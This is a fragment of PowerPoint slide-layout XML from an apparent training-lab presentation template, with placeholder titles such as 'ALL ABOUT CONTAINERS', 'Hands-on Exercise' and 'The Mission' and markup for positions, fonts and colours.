              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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3" y="3043654"/>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2"/>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dirty="0"/>
              <a:t>Module Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425766"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2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC36B60-D600-084C-9EF6-AEEC009AA89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69496" y="237203"/>
            <a:ext cx="2209800" cy="1504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4094B60-2871-9341-B801-C0F6F1FDA47D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E877783-76FF-F048-8454-17BA1B5373C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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4125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CC Title">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg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A7B0B21-F5A7-FA4F-B0FC-EE18261F9D2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9109363" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469497" y="3856737"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4072670"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4348763"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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3" y="3043654"/>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2"/>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dirty="0"/>
              <a:t>Module Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425766"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2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F632583B-88DD-EF4C-AA22-01FA30D97C0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69496" y="237203"/>
            <a:ext cx="2209800" cy="1504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09775AD1-8CDE-8646-9667-6A5438C4C4A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE063E5F-50C9-084E-8F8E-FA921FA4FE3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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81620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NE Module Intro">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437766" y="341314"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNE Module URL (https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>learninglabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Picture Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA2741B3-4C07-2F4B-AC2B-7887DE739F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1284890"/>
            <a:ext cx="8345488" cy="3263586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learning Lab Module Image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248308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ands On Exercise">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437766" y="637382"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNE Lab Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591D7585-EC32-AF4B-AC6D-18D793602D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1888761"/>
            <a:ext cx="4022068" cy="2478452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objectives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59F7CAC2-E697-0447-A314-412B22FAD525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362607" y="315630"/>
            <a:ext cx="2329484" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80BB0379-7718-0448-AE43-29AB7AF168A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5880510" y="341136"/>
            <a:ext cx="2902744" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="142872" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="261931" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="333367" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="404802" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Estimated Time: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4713D7A6-8EA3-4D43-A84B-0D40DD7ED047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761186" y="1883080"/>
            <a:ext cx="4022068" cy="2478452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caveats, reminders, things to note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A3B4B5F1-DDF5-904C-B731-F491D98C1483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1432782"/>
            <a:ext cx="1462260" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Objectives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF4FE45A-5E5A-B344-B80B-522FEE2CC166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761186" y="1435483"/>
            <a:ext cx="2475358" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Things to Consider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260645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ission">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437766" y="637382"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNE Lab Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591D7585-EC32-AF4B-AC6D-18D793602D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1888761"/>
            <a:ext cx="4022068" cy="2478452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objectives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59F7CAC2-E697-0447-A314-412B22FAD525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362607" y="315630"/>
            <a:ext cx="1529586" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Mission</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80BB0379-7718-0448-AE43-29AB7AF168A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5880510" y="341136"/>
            <a:ext cx="2902744" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="142872" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="261931" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="333367" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="404802" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Estimated Time: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4713D7A6-8EA3-4D43-A84B-0D40DD7ED047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761186" y="1883080"/>
            <a:ext cx="4022068" cy="2478452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caveats, reminders, things to note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14B64618-BCE9-A94F-B91D-F217B1F81910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1432782"/>
            <a:ext cx="1462260" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Objectives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6D4A86-0A38-3B40-8098-304C87AD2557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761186" y="1435483"/>
            <a:ext cx="2475358" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Things to Consider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272294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2"/>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91C13380-BF0B-3048-AE9D-9C032750AB7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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1550561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lumMod val="75000"/>
                  </a:schemeClr>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71013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Segue_White">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142267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DCI Mission Break">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618CC10-7F93-7A41-8993-E9C1B07FFE6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63057"/>
